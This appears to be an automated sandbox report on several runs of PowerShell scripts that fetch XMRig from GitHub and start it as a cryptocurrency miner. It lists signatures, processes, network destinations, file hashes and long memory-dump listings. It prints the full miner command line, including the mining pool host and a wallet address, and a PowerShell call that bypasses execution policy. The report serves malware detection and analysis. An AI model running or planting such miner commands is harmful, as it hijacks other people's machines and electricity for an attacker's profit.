memory/3876-67-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-68-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-69-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-70-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-71-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-72-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-73-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-74-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-75-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-76-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-77-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-78-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-79-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-80-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-81-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-82-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-83-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-84-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-85-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-86-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-87-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-88-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-89-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-90-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-91-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-92-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-93-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-94-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-95-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-96-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-97-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-98-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-99-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-100-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-101-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-102-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-103-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-104-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-105-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-106-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-107-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-108-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-109-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-110-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-111-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-112-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-113-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-114-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-115-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
memory/3876-116-0x00007FF6C7B10000-0x00007FF6C8743000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:45
Platform
win10-20240404-en
Max time kernel
1794s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3268 wrote to memory of 3264 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3268 wrote to memory of 3264 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.197.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/3268-0-0x00007FFB323B3000-0x00007FFB323B4000-memory.dmp
memory/3268-5-0x00000235A77C0000-0x00000235A77E2000-memory.dmp
memory/3268-8-0x00000235A7980000-0x00000235A79F6000-memory.dmp
memory/3268-9-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jzgez2dw.ryx.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3268-18-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/3268-25-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/3268-48-0x00000235A7960000-0x00000235A7972000-memory.dmp
memory/3268-61-0x00000235A7940000-0x00000235A794A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3264-90-0x00000207E0DD0000-0x00000207E0DF0000-memory.dmp
memory/3268-91-0x00007FFB323B3000-0x00007FFB323B4000-memory.dmp
memory/3268-92-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/3264-93-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3268-94-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/3264-95-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3268-96-0x00007FFB323B0000-0x00007FFB32D9C000-memory.dmp
memory/3264-97-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-98-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-99-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-100-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-101-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-102-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-103-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-104-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-105-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-106-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-107-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-108-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-109-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-110-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-111-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-112-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-113-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-114-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-115-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-116-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-117-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-118-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-119-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-120-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-121-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-122-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-123-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-124-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-125-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-126-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-127-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-128-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-129-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-130-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-131-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-132-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-133-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-134-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-135-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-136-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-137-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-138-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-139-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-140-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-141-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-142-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-143-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-144-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-145-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-146-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-147-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-148-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-149-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-150-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-151-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-152-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-153-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-154-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-155-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-156-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
memory/3264-157-0x00007FF7661E0000-0x00007FF766E13000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:32
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4188 wrote to memory of 2344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4188 wrote to memory of 2344 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/4188-2-0x00007FFF2E023000-0x00007FFF2E024000-memory.dmp
memory/4188-5-0x000001F5B36B0000-0x000001F5B36D2000-memory.dmp
memory/4188-6-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp
memory/4188-9-0x000001F5B3870000-0x000001F5B38E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dgfye0nu.0zj.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4188-10-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp
memory/4188-25-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp
memory/4188-48-0x000001F5B3850000-0x000001F5B3862000-memory.dmp
memory/4188-61-0x000001F5B3840000-0x000001F5B384A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2344-90-0x00000234B0F00000-0x00000234B0F20000-memory.dmp
memory/2344-91-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/4188-93-0x00007FFF2E023000-0x00007FFF2E024000-memory.dmp
memory/2344-92-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/4188-94-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp
memory/4188-95-0x00007FFF2E020000-0x00007FFF2EA0C000-memory.dmp
memory/2344-96-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-97-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-98-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-99-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-100-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-101-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-102-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-103-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-104-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-105-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-106-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-107-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-108-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-109-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-110-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-111-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-112-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-113-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-114-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-115-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-116-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-117-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-118-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-119-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-120-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-121-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-122-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-123-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-124-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-125-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-126-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-127-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-128-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-129-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-130-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-131-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-132-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-133-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-134-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-135-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-136-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-137-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-138-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-139-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-140-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-141-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-142-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-143-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-144-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-145-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-146-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-147-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-148-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-149-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-150-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-151-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-152-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-153-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-154-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-155-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-156-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:45
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4896 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
